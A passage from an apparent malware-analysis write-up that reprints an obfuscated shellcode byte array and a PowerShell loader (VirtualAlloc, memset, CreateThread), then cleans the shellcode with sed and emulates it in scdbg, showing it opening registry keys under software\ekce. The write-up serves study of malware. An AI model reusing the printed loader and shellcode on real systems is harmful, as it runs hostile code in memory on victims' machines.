xC6,<#kn#>0x5A,0x8B,0xFA,0x33,0xD2,0xF7,0xF7,0x33,0xC0,0x8A,0x84,0x15,0x00,0xFA,0xFF,0xFF,0x03,0xD8,0x81,0xE3,0xFF,<#ez#>0x00,0x00,0x00,0x8A,0x01,0x8B,0x94,0x9D,0x00,0xFB,0xFF,0xFF,0x89,0x11,0x25,0xFF,0x00,0x00,0x00,0x89,0x84,0x9D,<#pgr#>0x00,0xFB,0xFF,0xFF,0x46,0x83,0xC1,0x04,<#lr#>0x81,0xFE,0x00,0x01,0x00,0x00,0x75,0xB5,0x33,0xDB,0x33,0xFF,0x6A,0x40,0x68,0x00,0x30,0x00,0x00,0x8B,0x85,0x60,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0xFF,0x55,<#jij#>0xA8,0x89,0x85,0x5C,0xFF,0xFF,0xFF,0x83,0xBD,0x5C,0xFF,0xFF,<#vw#>0xFF,0x00,0x74,0x29,0x8B,0x85,0x5C,0xFF,0xFF,0xFF,0x89,0x85,0x4C,0xFF,0xFF,<#iku#>0xFF,0x8B,0x85,<#js#>0x60,<#kd#>0xFF,0xFF,0xFF,0x50,0x8B,0x85,0x64,0xFF,0xFF,0xFF,0x50,0x8B,0x85,0x4C,0xFF,0xFF,0xFF,0x50,0xFF,0x95,<#wh#>0x78,0xFF,0xFF,<#wwb#>0xFF,0xEB,0x05,0x6A,0x00,0xFF,0x55,0xA4,0x8B,0x85,0x60,0xFF,0xFF,0xFF,<#si#>0x48,0x85,0xC0,0x72,0x74,0x40,0x89,0x85,0x3C,0xFF,0xFF,0xFF,0x33,0xF6,0x43,0x81,0xE3,0xFF,0x00,0x00,0x00,0x03,0xBC,0x9D,0x00,0xFB,0xFF,0xFF,0x81,0xE7,0xFF,0x00,0x00,0x00,0x8A,0x84,0x9D,0x00,0xFB,0xFF,0xFF,0x8B,0x94,0xBD,0x00,0xFB,0xFF,0xFF,0x89,0x94,0x9D,0x00,0xFB,0xFF,0xFF,0x25,0xFF,0x00,0x00,0x00,0x89,0x84,0xBD,0x00,0xFB,0xFF,0xFF,0x8B,0x85,0x4C,0xFF,0xFF,0xFF,0x8A,0x04,0x30,0x8B,0x94,0x9D,0x00,0xFB,0xFF,<#sru#>0xFF,0x03,0x94,0xBD,0x00,0xFB,0xFF,0xFF,0x81,0xE2,0xFF,0x00,0x00,0x00,0x32,0x84,0x95,0x00,0xFB,0xFF,0xFF,0x8B,0x95,0x4C,0xFF,0xFF,0xFF,0x88,<#ev#>0x04,0x32,0x46,0xFF,0x8D,0x3C,0xFF,0xFF,0xFF,0x75,0x95,0x8B,0x85,0x4C,<#oq#>0xFF,0xFF,0xFF,0x89,0x45,<#ah#>0xD4,0x8B,0x45,0xD4,0x66,0x81,0x38,0x4D,<#ta#>0x5A,0x0F,0x85,0xDA,0x02,0x00,0x00,0x8B,0x45,0xD4,<#qy#>0x8B,0x40,0x3C,0x03,0x85,0x4C,0xFF,0xFF,0xFF,0x89,0x45,<#kco#>0xD0,0x8B,0x45,0xD0,0x81,<#vo#>0x38,0x50,0x45,0x00,0x00,0x0F,0x85,0xBC,0x02,0x00,0x00,0x8B,0x45,0xD0,0x8B,0x58,0x50,0x03,0xDB,<#xlf#>0x6A,0x40,0x68,0x00,0x30,0x00,0x00,0x53,0x6A,<#wle#>0x00,0xFF,0x55,0xA8,0x89,0x45,<#bf#>0xF8,0x83,0x7D,<#of#>0xF8,0x00,0x0F,0x84,0x9A,0x02,0x00,0x00,0x8B,0x45,0xD0,0x8B,<#xp#>0x40,<#vxw#>0x54,<#vef#>0x50,0x8B,0x85,0x4C,<#ew#>0xFF,0xFF,0xFF,0x50,0x8B,0x45,0xF8,0x50,<#bbd#>0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x6A,0x04,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x05,0xE0,0x00,<#dfh#>0x00,0x00,0x50,0x8B,0x45,0xD0,0x8B,0x40,0x50,0x03,0x45,0xF8,0x50,0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x8B,0x80,0xE0,0x00,0x00,0x00,0x50,<#hxe#>0x8B,<#od#>0x85,0x4C,0xFF,0xFF,0xFF,0x50,0x8B,0x45,0xD0,0x8B,<#bdt#>0x40,0x50,0x03,0x45,0xF8,0x83,0xC0,0x04,0x50,0xFF,0x95,0x78,<#boc#>0xFF,0xFF,0xFF,0x6A,0x60,0x8B,0x85,<#wu#>0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x7A,0x50,0x8B,0x45,0xD0,0x8B,0x40,0x50,0x03,0x45,0xF8,0x83,<#on#>0xC0,0x04,0x8B,0x95,0x7C,0xFF,<#gjg#>0xFF,0xFF,0x03,0x82,0xE0,0x00,0x00,0x00,0x50,0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x8B,0x45,0xD0,0x0F,0xB7,0x40,0x06,0x48,0x85,0xC0,<#kiu#>0x7C,0x5F,0x40,0x89,0x85,0x3C,0xFF,0xFF,0xFF,0x33,0xF6,0x8B,0x55,0xD4,0x8B,0x52,0x3C,0x8B,0x85,0x4C,0xFF,0xFF,0xFF,0x03,0xD0,0x81,0xC2,0xF8,0x00,0x00,0x00,0x8B,0xCE,0xC1,0xE1,0x03,<#zr#>0x8D,0x0C,0x89,0x03,0xD1,0x89,0x95,0x50,0xFF,0xFF,0xFF,0x8B,0x95,0x50,0xFF,0xFF,0xFF,0x8B,0x52,<#hxa#>0x10,0x52,0x8B,0x95,0x50,0xFF,0xFF,0xFF,0x8B,0x52,0x14,0x03,0xD0,0x52,0x8B,0x85,0x50,0xFF,0xFF,0xFF,0x8B,0x40,0x0C,0x03,0x45,0xF8,0x50,0xFF,<#ro#>0x95,0x78,0xFF,0xFF,0xFF,<#yc#>0x46,0xFF,0x8D,0x3C,0xFF,0xFF,<#ypg#>0xFF,0x75,0xAA,0x8B,0x45,0xD0,0x8B,0x40,0x34,0x3B,0x45,0xF8,0x0F,0x84,0xCB,0x00,0x00,0x00,0x8B,0x45,0xD0,0x8B,0x55,0xF8,0x2B,0x50,0x34,0x89,0x55,0xD8,0x8B,0x45,<#jxt#>0xF8,0x89,0x45,0xF0,0x8B,0x45,0xD0,0x83,0xB8,0xA4,0x00,0x00,<#da#>0x00,0x00,0x0F,0x86,<#pyu#>0x87,0x00,<#kza#>0x00,0x00,0x8B,0x45,0xD0,0x8B,0x80,0xA0,0x00,<#vv#>0x00,0x00,0x03,0x45,0xF0,0x89,<#um#>0x45,0xEC,0xEB,0x6E,0x8B,0x45,0xEC,0x8B,0x00,0x03,0x45,0xF0,0x89,<#kzd#>0x45,0xE8,0x8B,0x45,0xEC,0x83,0xC0,0x08,0x89,0x45,0xE4,0x8B,0x45,0xEC,0x8B,0x40,0x04,<#frn#>0x83,0xE8,0x08,0xD1,0xE8,0x48,0x85,0xC0,0x72,0x3E,0x40,0x89,0x85,0x3C,0xFF,0xFF,0xFF,0x8B,0x45,0xE4,0x66,0x8B,0x10,0x0F,0xB7,0xC2,0xC1,0xE8,0x0C,0x8B,0xCA,0x66,0x81,0xE1,0xFF,0x0F,0x0F,0xB7,0xC9,0x83,0xF8,0x03,<#uvt#>0x75,0x10,<#dys#>0x8B,<#xss#>0x45,0xE8,0x03,0xC1,0x89,0x45,<#qsp#>0xE0,0x8B,0x45,0xE0,0x8B,0x55,0xD8,0x01,0x10,0x83,0x45,0xE4,0x02,0xFF,0x8D,0x3C,0xFF,0xFF,<#iow#>0xFF,0x75,0xC9,0x8B,0x45,0xEC,0x8B,0x40,0x04,0x03,0x45,0xEC,0x89,0x45,0xEC,0x8B,0x45,0xEC,0x83,0x38,0x00,0x77,0x8A,0x8B,0x45,0xD0,0x8B,0x55,0xF8,0x89,0x50,0x34,0x68,0xF8,0x00,0x00,0x00,0x8B,0x45,0xD0,0x50,0x8B,0x45,0xD4,0x8B,0x40,0x3C,0x03,0x45,0xF8,0x50,0xFF,0x95,0x78,0xFF,0xFF,<#md#>0xFF,0x8B,0x45,0xD0,0x05,0x80,0x00,0x00,0x00,0x89,0x45,0x90,0x8B,0x45,0x90,0x83,0x78,0x04,0x00,0x0F,<#hr#>0x86,0x9E,0x00,0x00,0x00,0x8B,0x45,0xD0,0x8B,0x80,0x80,0x00,0x00,<#has#>0x00,0x03,0x45,0xF8,<#oz#>0x89,0x45,0x8C,0xEB,0x7F,0x03,0x7D,0xF8,0x57,0xFF,0x55,0xBC,0x8B,<#qmp#>0xD8,0x85,0xDB,0x74,<#se#>0x72,0x8B,0x45,0x8C,0x83,0x38,0x00,0x74,0x0D,0x8B,0x45,0x8C,0x8B,0x00,0x03,0x45,0xF8,0x89,0x45,0x88,0xEB,<#nhi#>0x0C,0x8B,0x45,0x8C,0x8B,0x40,0x10,0x03,<#zw#>0x45,0xF8,0x89,0x45,0x88,0x8B,<#re#>0x45,<#fgs#>0x8C,0x8B,0x40,<#be#>0x10,0x03,0x45,0xF8,0x89,0x45,0x84,0xEB,0x37,0x8B,0x45,0x88,<#me#>0x8B,0x30,0xF7,0xC6,0x00,0x00,0x00,0x80,<#nn#>0x74,0x12,0x81,0xE6,0xFF,0xFF,0x00,0x00,<#odn#>0x56,0x53,<#hb#>0xFF,0x55,0xB8,0x8B,0x55,0x84,0x89,0x02,0xEB,0x10,0x03,0x75,0xF8,0x83,<#md#>0xC6,0x02,0x56,0x53,0xFF,0x55,0xB8,0x8B,0x55,0x84,0x89,0x02,0x83,0x45,0x88,0x04,0x83,0x45,0x84,<#cyw#>0x04,0x8B,<#uf#>0x45,0x88,0x83,0x38,0x00,<#xfd#>0x75,<#uwx#>0xC1,<#kv#>0x83,0x45,0x8C,0x14,0x8B,0x45,0x8C,0x8B,0x78,0x0C,0x85,0xFF,0x0F,0x85,0x73,0xFF,0xFF,0xFF,0x8B,0x45,0xD0,0x8B,0x40,0x28,0x03,0x45,0xF8,0x89,0x45,0xF4,0x31,0xC0,0x50,0x6A,0x01,0xFF,0x75,<#vr#>0xF8,0xFF,0x55,0xF4,0x6A,0x00,0xFF,0x55,0xA4,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,0x04,0x00,0x8D,<#go#>0x40,0x00,0x73,0x6F,0x66,0x74,0x77,0x61,0x72,0x65,0x5C,0x65,0x6B,0x63,0x65,0x00,0x00,<#mmq#>0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,<#xa#>0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x62,0x6E,0x6A,0x66,0x6F,0x65,0x00,<#vjy#>0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x5E,0x67,0x3A,0x12,0x9A,0x95,0x15,0x63,<#zuj#>0x06,0xAF,0x82,0xDD,0xA0,0x4D,<#at#>0x53,0x85,0xF4,0x57,0xD5,<#mhv#>0x5D,0x57,0x6A,0xB0,0x69,0x4A,0x08,0xCA,0xD1,0x9F,0x4F,0xDE,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x73,0x00,0x68,0x00,0x65,0x00,0x6C,0x00,0x6C,<#ubx#>0x00,0x3C,0x00,0x3C,0x00,0x3A,0x00,0x3A,0x00,0x3E,0x00,0x3E,0x00,0x73,0x00,0x68,0x00,<#jc#>0x65,0x00,0x6C,0x00,0x6C,0x00,0x72,0x00,0x6D,0x00,0x3C,0x00,0x65,0x00,0x6B,0x00,0x63,0x00,0x65,0x00,0x3E,0x00,0x72,0x00,0x6D,0x00,<#sxr#>0x00,0x00,0x00,0x00,0x00,<#jd#>0x00,0x00,0x00,0x00,0x00,<#ora#>0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,<#wt#>0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,<#rea#>0x00,0x00,0x00,0x1F,0x00,0x00,0x00,0x00,0xAA,0x06,0x00,0x55,0x8B,0xEC,0x60,0x8B,0x7D,0x08,0x8B,0x75,0x0C,<#pyc#>0x8B,0x4D,0x10,0xF3,0xA4,0x61,0x5D,0xC2,0x0C,0x00,0x38,0xDB,0xE2,<#gb#>0x50,0xA3,0x70,0x80,0x60,0x41,0xF7,0x49,0xB3,0x5A,0xE1,0x53,0xD1,0xBC,0xB4,0x6E,0xB0,0x74,0x98,0xB4,0xF5,0x3C,0x6C,0x81,0x3D,0x12,0xB7,<#zg#>0xE9,0xF5,0xC2,0x34,0x23,0xA5,0x4E,0xD7,0x50,0x8D,0x7B,0x85,0xBB,0x19,0x00,0xD8,0x76,0x7F,0x09,0xB5,0xD3,0x86,0x14,0x82,<#ir#>0x44,0x59,0x5F,<#hld#>0x43,0x87,0xCB,<#wxa#>0x68,0xF6,0x32,0x8F,0x2E,0xEA,0x06,0x31,0x45,0xF0,<#oaw#>0x91,0xDA,0xDF,0x95,0x1F,0x38,<#vm#>0x5F,0xDA,0xE1,0xF4,0x1F,0x0D,0xE4,0xB7,<#frx#>0x6B,0xAB,0x3A,0x96,0xF8,0x8A,0x5A;
#wgtrs
$pr=([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc kernel32.dll VirtualAlloc),(gdelegate @([IntPtr],[UInt32],[UInt32],[UInt32]) ([UInt32])))).Invoke(0,$sc32.Length,0x3000,0x40);
#ykcmdtyr
if($pr -ne 0){$memset=([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc msvcrt.dll memset),(gdelegate @([UInt32],[UInt32],[UInt32]) ([IntPtr]))));
#mmaai
for ($i=0;$i -le ($sc32.Length-1);$i++) {$memset.Invoke(($pr+$i), $sc32[$i], 1)};
#tsaoik
([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc kernel32.dll CreateThread),(gdelegate @([IntPtr],[UInt32],[UInt32],[UInt32],[UInt32],[IntPtr]) ([IntPtr])))).Invoke(0,0,$pr,$pr,0,0);
#wpzomec
}sleep(1200);}catch{}exit;
#dwkjttuue
#ysiuayivua

I next copied the contents of the variable $sc32, pasting it into a file named sc.bin. I then cleaned up the shellcode by removing the entries such as <#eg#>  taking advantage of sed. At the end, the finished product looked like.

remnux@remnux:/tmp$ cat sc.bin | sed -E 's/<#[a-z]*#>//g' | sed 's/0x/\\x/g' | sed 's/,//g' > sc-cleaned.bin

remnux@remnux:/tmp$ cat sc-cleaned.bin | more
\x55\x8B\xEC\x81\xC4\x00\xFA\xFF\xFF\x53\x56\x57\x53\x56\x57\xFC\x31\xD2\x64\x8B\x52\x30\x8B\x52\x0C\x8B\x5
2\x14\x8B\x72\x28\x6A\x18\x59\x31\xFF\x31\xC0\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x81\x
FF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B\x12\x75\xDB\x89\x5D\xFC\x5F\x5E\x5B\x8B\x45\xFC\x89\x45\xD4\x8B\x45\xD4\
....... truncated for brevity .....

Taking a quick look from the perspective of scdbg, I see:

C:\users\securitynik>scdbg /auto /f sc-cleaned.bin
Detected \x encoding input format converting...

4012cf  LoadLibraryA(advapi32.dll)
401485  RegOpenKeyExA(HKLM\, )
40154d  RegOpenKeyExA(HKCU\, )
4015e4  ExitProcess(0)

Stepcount 49041

At this point, we see the shellcode interacts with the registry. However, we have no evidence of they particular keys which are being accessed. This is because the shellcode expects a parameter which points to its address in memory. Here is how that is provided via scdbg.

C:\users\securitynik>scdbg /f sc-cleaned.bin /vvv
Loaded 2e6c bytes from file sc-cleaned.bin
Detected \x encoding input format converting...
Initialization Complete..
Max Steps: 2000000
Using base offset: 0x401000 
    ; Nik's comments: 0x401000 location of shellcode in memory
    ; This value is to be passed as a parameter to the shellcode
Verbosity: 3

401000   55                              push ebp                step: 0  foffset: 0
eax=0         ecx=0         edx=0         ebx=0
esp=12fe00    ebp=12fff0    esi=0         edi=0          EFL 0
; Nik's comments: esp=12fe00 - Where the stack pointer currently points
; Since the shellcode address is a 4 byte value (x86 architecture), we need to push
; This 4 byte value to the stack, just before the shellcode is called.


dbg>
[ESP - 10] = 00000000
[ESP - c ] = 00000000
[ESP - 8 ] = 00000000
[ESP - 4 ] = 00000000
[ESP --> ] = 00000000 ; Nik's comments: ESP points to address 12fe00 but has a value of 0x00000000
[ESP + 4 ] = 00000000 ; Nik's comments: We need this to point have a value of the shellcode address in memory
[ESP + 8 ] = 00000000
[ESP + c ] = 00000000
[ESP + 10] = 00000000
[ESP + 14] = 00000000
[ESP + 18] = 00000000

dbg> .poke4 ; Nik's comments: specify we wish to add a 4 byte value

Enter address to write to: (hex/reg) 0x12fe04 ; Nik's comments: The 4 byte address of ESP+4 (12fe00+4)
12fe04
Enter value to write: (hex/reg) 0x401000 ; Nik's comments: Address of shellcode in memory
401000
dbg>
[ESP - 10] = 00000000
[ESP - c ] = 00000000
[ESP - 8 ] = 00000000
[ESP - 4 ] = 00000000
[ESP --> ] = 00000000
[ESP + 4 ] = 00401000 ; Nik's comments: ESP+4 now has the shellcode address in memory
[ESP + 8 ] = 00000000
[ESP + c ] = 00000000
[ESP + 10] = 00000000
[ESP + 14] = 00000000
[ESP + 18] = 00000000

dbg>
4012cf  LoadLibraryA(advapi32.dll)
401485  RegOpenKeyExA(HKLM\, software\ekce)
40154d  RegOpenKeyExA(HKCU\, software\ekce)
4015e4  ExitProcess(0)
; Nik's comments: After running, we now see the registry keys that it is attempting to open.

Stepcount 49041

That's it for me on this one. I achieved my learning objectives.

References:

Virus Total report 
HKEY_LOCAL_MACHINE\SOFTWARE\Classes
SANS FOR610 - Reverse Engineering Malware
JS Beautifier
SED Man page
scdbg shellcode analysis